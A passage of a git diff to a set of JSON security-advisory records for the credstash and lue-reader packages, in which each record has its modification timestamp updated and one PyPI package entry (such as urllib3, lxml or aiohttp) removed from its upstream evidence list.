"subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-50181.json b/advisories/BREW-credstash-CVE-2025-50181.json index db5687210e1..cf4b59e177c 100644 --- a/advisories/BREW-credstash-CVE-2025-50181.json +++ b/advisories/BREW-credstash-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-50181", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-50182.json b/advisories/BREW-credstash-CVE-2025-50182.json index 46ffa519138..7a4f560a8e3 100644 --- a/advisories/BREW-credstash-CVE-2025-50182.json +++ b/advisories/BREW-credstash-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-50182", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-66418.json b/advisories/BREW-credstash-CVE-2025-66418.json index 62101c39472..23a4ca47136 100644 --- a/advisories/BREW-credstash-CVE-2025-66418.json +++ b/advisories/BREW-credstash-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-66418", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2025-66471.json b/advisories/BREW-credstash-CVE-2025-66471.json index e941c62df44..b20ee024f2b 100644 --- a/advisories/BREW-credstash-CVE-2025-66471.json +++ b/advisories/BREW-credstash-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2025-66471", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2026-21441.json b/advisories/BREW-credstash-CVE-2026-21441.json index 9b1c072a3bd..16de0209ac4 100644 --- a/advisories/BREW-credstash-CVE-2026-21441.json +++ b/advisories/BREW-credstash-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2026-21441", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2026-44431.json b/advisories/BREW-credstash-CVE-2026-44431.json index bf9fe786973..b90fc0d555c 100644 --- a/advisories/BREW-credstash-CVE-2026-44431.json +++ b/advisories/BREW-credstash-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2026-44431", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-credstash-CVE-2026-44432.json b/advisories/BREW-credstash-CVE-2026-44432.json index 890ee57e4d5..1a1768e106e 100644 --- a/advisories/BREW-credstash-CVE-2026-44432.json +++ b/advisories/BREW-credstash-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-credstash-CVE-2026-44432", "published": "2026-08-13T16:41:15Z", - "modified": "2026-08-13T16:41:15Z", + "modified": "2026-09-10T19:02:03Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2014-3146.json b/advisories/BREW-lue-reader-CVE-2014-3146.json index 5b76ca7d048..b4e3dfd354d 100644 --- a/advisories/BREW-lue-reader-CVE-2014-3146.json +++ b/advisories/BREW-lue-reader-CVE-2014-3146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2014-3146", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-57qw-cc2g-pv5p", "CVE-2014-3146", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2015-8557.json b/advisories/BREW-lue-reader-CVE-2015-8557.json index 79958fe650f..967c6fcd924 100644 --- a/advisories/BREW-lue-reader-CVE-2015-8557.json +++ b/advisories/BREW-lue-reader-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2015-8557", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2016-5851.json b/advisories/BREW-lue-reader-CVE-2016-5851.json index c8363765621..8b49ebe2516 100644 --- a/advisories/BREW-lue-reader-CVE-2016-5851.json +++ b/advisories/BREW-lue-reader-CVE-2016-5851.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2016-5851", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-34wj-p5jm-2p96", "CVE-2016-5851", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-docx", - "subject_version": "1.2.0", - "key": "pkg:pypi/python-docx@1.2.0", - "resource": "python-docx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2018-19787.json b/advisories/BREW-lue-reader-CVE-2018-19787.json index d7a78e44524..20dbaa01611 100644 --- a/advisories/BREW-lue-reader-CVE-2018-19787.json +++ b/advisories/BREW-lue-reader-CVE-2018-19787.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2018-19787", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-xp26-p53h-6h2p", "CVE-2018-19787", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2020-27783.json b/advisories/BREW-lue-reader-CVE-2020-27783.json index cb31fdeac1c..9db1a459410 100644 --- a/advisories/BREW-lue-reader-CVE-2020-27783.json +++ b/advisories/BREW-lue-reader-CVE-2020-27783.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2020-27783", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-pgww-xf46-h92r", "CVE-2020-27783", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-20270.json b/advisories/BREW-lue-reader-CVE-2021-20270.json index e237b6e3e57..a19b6345009 100644 --- a/advisories/BREW-lue-reader-CVE-2021-20270.json +++ b/advisories/BREW-lue-reader-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-20270", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-21330.json b/advisories/BREW-lue-reader-CVE-2021-21330.json index 65783ca44bd..f9921b1e34a 100644 --- a/advisories/BREW-lue-reader-CVE-2021-21330.json +++ b/advisories/BREW-lue-reader-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-21330", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-27291.json b/advisories/BREW-lue-reader-CVE-2021-27291.json index b73a17b8d53..e14cc2bb054 100644 --- a/advisories/BREW-lue-reader-CVE-2021-27291.json +++ b/advisories/BREW-lue-reader-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-27291", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-28957.json b/advisories/BREW-lue-reader-CVE-2021-28957.json index ada88719a65..c73a7c4ed25 100644 --- a/advisories/BREW-lue-reader-CVE-2021-28957.json +++ b/advisories/BREW-lue-reader-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-28957", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2021-43818.json b/advisories/BREW-lue-reader-CVE-2021-43818.json index 1188920993f..b905a236c31 100644 --- a/advisories/BREW-lue-reader-CVE-2021-43818.json +++ b/advisories/BREW-lue-reader-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2021-43818", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2022-2309.json b/advisories/BREW-lue-reader-CVE-2022-2309.json index 23f2f0ec5de..505af3ce1b4 100644 --- a/advisories/BREW-lue-reader-CVE-2022-2309.json +++ b/advisories/BREW-lue-reader-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2022-2309", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2022-40896.json b/advisories/BREW-lue-reader-CVE-2022-40896.json index 412b7061a2f..a1f25ca03a6 100644 --- a/advisories/BREW-lue-reader-CVE-2022-40896.json +++ b/advisories/BREW-lue-reader-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2022-40896", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-26302.json b/advisories/BREW-lue-reader-CVE-2023-26302.json index a115346dd72..2cc29e8659e 100644 --- a/advisories/BREW-lue-reader-CVE-2023-26302.json +++ b/advisories/BREW-lue-reader-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-26302", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-26303.json b/advisories/BREW-lue-reader-CVE-2023-26303.json index 77e7e6b28b8..53d70e96c1d 100644 --- a/advisories/BREW-lue-reader-CVE-2023-26303.json +++ b/advisories/BREW-lue-reader-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-26303", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-37276.json b/advisories/BREW-lue-reader-CVE-2023-37276.json index b9b0aab9ef9..b3533ef4c76 100644 --- a/advisories/BREW-lue-reader-CVE-2023-37276.json +++ b/advisories/BREW-lue-reader-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-37276", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-47627.json b/advisories/BREW-lue-reader-CVE-2023-47627.json index 0212a4e3938..2aedaeb9bbb 100644 --- a/advisories/BREW-lue-reader-CVE-2023-47627.json +++ b/advisories/BREW-lue-reader-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-47627", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-47641.json b/advisories/BREW-lue-reader-CVE-2023-47641.json index 310b6fae423..5868263abce 100644 --- a/advisories/BREW-lue-reader-CVE-2023-47641.json +++ b/advisories/BREW-lue-reader-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-47641", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-49081.json b/advisories/BREW-lue-reader-CVE-2023-49081.json index 0a6bb659352..2699aa26935 100644 --- a/advisories/BREW-lue-reader-CVE-2023-49081.json +++ b/advisories/BREW-lue-reader-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-49081", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2023-49082.json b/advisories/BREW-lue-reader-CVE-2023-49082.json index b8c8959b68a..b493e057d59 100644 --- a/advisories/BREW-lue-reader-CVE-2023-49082.json +++ b/advisories/BREW-lue-reader-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2023-49082", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-23334.json b/advisories/BREW-lue-reader-CVE-2024-23334.json index a849c2eeb71..c6d8d160c32 100644 --- a/advisories/BREW-lue-reader-CVE-2024-23334.json +++ b/advisories/BREW-lue-reader-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-23334", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-23829.json b/advisories/BREW-lue-reader-CVE-2024-23829.json index 828692dd993..f2bbc105105 100644 --- a/advisories/BREW-lue-reader-CVE-2024-23829.json +++ b/advisories/BREW-lue-reader-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-23829", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-27306.json b/advisories/BREW-lue-reader-CVE-2024-27306.json index 815825e8300..cd67340bb69 100644 --- a/advisories/BREW-lue-reader-CVE-2024-27306.json +++ b/advisories/BREW-lue-reader-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-27306", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-30251.json b/advisories/BREW-lue-reader-CVE-2024-30251.json index 7bf50521583..64e211994a1 100644 --- a/advisories/BREW-lue-reader-CVE-2024-30251.json +++ b/advisories/BREW-lue-reader-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-30251", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-3651.json b/advisories/BREW-lue-reader-CVE-2024-3651.json index f93c33983ff..405e3d7957b 100644 --- a/advisories/BREW-lue-reader-CVE-2024-3651.json +++ b/advisories/BREW-lue-reader-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-3651", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-42367.json b/advisories/BREW-lue-reader-CVE-2024-42367.json index b3a0d3dc64c..bba1f5fe233 100644 --- a/advisories/BREW-lue-reader-CVE-2024-42367.json +++ b/advisories/BREW-lue-reader-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-42367", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-52303.json b/advisories/BREW-lue-reader-CVE-2024-52303.json index 82b0df3e076..b4196867c7f 100644 --- a/advisories/BREW-lue-reader-CVE-2024-52303.json +++ b/advisories/BREW-lue-reader-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-52303", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2024-52304.json b/advisories/BREW-lue-reader-CVE-2024-52304.json index 1bc4ac07b49..6a12fc4b55e 100644 --- a/advisories/BREW-lue-reader-CVE-2024-52304.json +++ b/advisories/BREW-lue-reader-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2024-52304", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", 